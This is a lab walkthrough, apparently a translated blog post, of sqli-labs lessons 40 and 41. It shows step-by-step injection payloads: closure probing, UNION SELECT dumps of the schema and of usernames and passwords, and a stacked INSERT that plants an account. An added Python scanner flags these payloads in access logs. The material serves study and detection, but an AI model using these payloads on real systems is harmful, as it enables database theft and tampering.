(manual) [sqli labs40, 41] stack injection, blind injection
2022-07-18 15:21:00 【Black zone (rise)】
Catalog
One、 Recommended reading
Two、 (manual) Basic steps of SQL injection
Three、 Less40 (GET - BLIND based - String - Stacked)
3.1、 Brief introduction (stacked injection - blind injection - string-type injection)
3.2、 Step one: injection point test
3.3、 Step two: analyze filtering
3.4、 Step three: determine the number of fields / echo positions
3.5、 Step four: dump the database name
3.6、 Step five: dump the table names
3.7、 Step six: dump the column names
3.8、 Step seven: insert an account via stacked injection
3.9、 Step eight: dump the data
Four、 Less41 (GET - BLIND based - Intiger Stacked)
4.1、 Brief introduction (stacked injection - blind injection - integer-type injection)
4.2、 Exploitation
One、 Recommended reading:
【SQL injection】 Stacked injection
https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501
【SQL injection】 Integer-type injection & string-type injection
https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185^v2^control&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450
【SQL injection - no echo】 Boolean blind injection: principle, functions, usage
https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
【SQL injection - no echo】 Time-based blind injection: principle, functions, usage
https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
Two、 (manual) Basic steps of SQL injection:
Step one: injection point test
Step two: analyze permissions
Step three: determine the number of fields
Step four: dump the database name
Step five: dump the table names
Step six: dump the column names
Step seven: insert an account via stacked injection
Step eight: query the data
Three、 Less40 (GET - BLIND based - String - Stacked)
3.1、 Brief introduction (stacked injection - blind injection - string-type injection)
Request method: GET
Technique: stacked injection + closing with ') (string-type injection) + blind injection + UNION query
3.2、 Step one: injection point test
?id=1
Normal page.
Input ?id=1'
Abnormal page.
This indicates an injection point, and that a single quote is part of the closure.
?id=1'--+
Abnormal page.
This indicates that something else is also part of the closure.
?id=1')--+
Normal page.
From the tests above we can conclude:
there is an injection point,
and it is closed with ').
3.3、 Step two: analyze filtering
Method 1:
Replace the characters of the injected statement one at a time until no error occurs (time-consuming),
or replace them all at once (if something fails, you cannot tell where the filtering happened).
Method 2:
Get the source code and do a white-box audit (the best option).
3.4、 Step three: determine the number of fields / echo positions
?id=1') union select 1,2,3 --+
Normal echo.
?id=1') union select 1,2,3,4 --+
Abnormal echo.
This shows that the number of fields is 3.
Determine the echo positions:
?id=-1') union select 1,2,3 --+
3.5、 Step four: dump the database name
?id=-1') union select 1,2,database() --+
3.6、 Step five: dump the table names
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
3.7、 Step six: dump the column names
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
3.8、 Step seven: insert an account via stacked injection
?id=1');insert into users(id,username,password) values ('40','less40','at40')--+
3.9、 Step eight: dump the data
?id=-1') union select 1,2,group_concat(username,password) from security.users--+
The row we inserted is visible in the output.
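The steps above leave a recognisable trail in the web server's access log. The following is an added example, not part of the original post: a small Python scanner over constructed combined-log lines that replay the walkthrough's sequence against a lab host. It URL-decodes each query parameter (which is what turns the "--+" of the URL into the "-- " comment terminator), tags quotes, comment terminators, UNION SELECT and ";"-stacked statements, and flags a client whose error response to the bare quote probe was followed by a successful comment-terminated request, the "closure found" moment of step one. The log lines, IP addresses and status codes are constructed; the payload text is the one shown in the walkthrough.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in combined-log format (not from the original post);
# they replay the walkthrough's probing sequence against a lab host.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2022:15:21:00 +0800] "GET /Less-40/?id=1 HTTP/1.1" 200 1234
10.0.0.5 - - [18/Jul/2022:15:21:02 +0800] "GET /Less-40/?id=1' HTTP/1.1" 500 512
10.0.0.5 - - [18/Jul/2022:15:21:04 +0800] "GET /Less-40/?id=1')--+ HTTP/1.1" 200 1234
10.0.0.5 - - [18/Jul/2022:15:21:06 +0800] "GET /Less-40/?id=-1')%20union%20select%201,2,database()%20--+ HTTP/1.1" 200 1300
10.0.0.5 - - [18/Jul/2022:15:21:08 +0800] "GET /Less-40/?id=1');insert%20into%20users(id,username,password)%20values%20('40','less40','at40')--+ HTTP/1.1" 200 1234
10.0.0.9 - - [18/Jul/2022:15:22:00 +0800] "GET /Less-41/?id=2 HTTP/1.1" 200 1200
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules run against the URL-decoded value of each query parameter. Decoding
# first matters: "--+" only becomes the "-- " comment terminator once "+"
# has been turned back into a space.
RULES = [
    ("stacked_query", re.compile(r";\s*(insert|update|delete|drop|create|alter|select)\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("comment_terminator", re.compile(r"--\s|#|/\*")),
    ("quote_in_param", re.compile(r"['\"]")),
]


def decode_params(target: str) -> dict:
    """Split the query string on '&' and decode each key/value ('+' -> space)."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify(value: str) -> list:
    """Names of every rule the decoded value matches, sorted for stable output."""
    return sorted(name for name, rx in RULES if rx.search(value))


def scan_log(text: str) -> list:
    """One finding per (request, parameter) that matched at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for key, value in decode_params(m["target"]).items():
            tags = classify(value)
            if tags:
                findings.append({"ip": m["ip"], "ts": m["ts"],
                                 "path": urlsplit(m["target"]).path,
                                 "status": int(m["status"]), "param": key,
                                 "value": value, "tags": tags})
    return findings


def summarize(findings: list) -> dict:
    """Per client: flagged-request count, the union of tags, and whether an
    error response (the bare quote probe) was later followed by a successful
    comment-terminated request, i.e. the closure was found. Findings are
    assumed to be in log order. If the application answers 200 even on SQL
    errors, compare response sizes against a baseline instead of the status."""
    per_ip = {}
    for f in findings:
        s = per_ip.setdefault(f["ip"], {"flagged": 0, "tags": set(),
                                        "saw_error": False, "closure_found": False})
        s["flagged"] += 1
        s["tags"].update(f["tags"])
        if f["status"] >= 500:
            s["saw_error"] = True
        elif s["saw_error"] and "comment_terminator" in f["tags"]:
            s["closure_found"] = True
    return per_ip


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["param"], h["tags"], repr(h["value"]))
    for ip, s in summarize(hits).items():
        print(ip, "flagged:", s["flagged"], "closure_found:", s["closure_found"], sorted(s["tags"]))
```

Because the rules see decoded values, a client cannot hide the payload behind percent-encoding, and the per-client summary is what you would feed to an alert: a single quote in an id parameter is noise on its own, but an error followed by a clean comment-terminated request from the same address is the signature of the closure search in step one.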
Four、 Less41 (GET - BLIND based - Intiger Stacked)
4.1、 Brief introduction (stacked injection - blind injection - integer-type injection)
Request method: GET
Technique: stacked injection + no quote closure (integer-type injection) + blind injection + UNION query
4.2、 Exploitation:
Compared with Less40,
Less41 is integer-type injection, so no closure is required.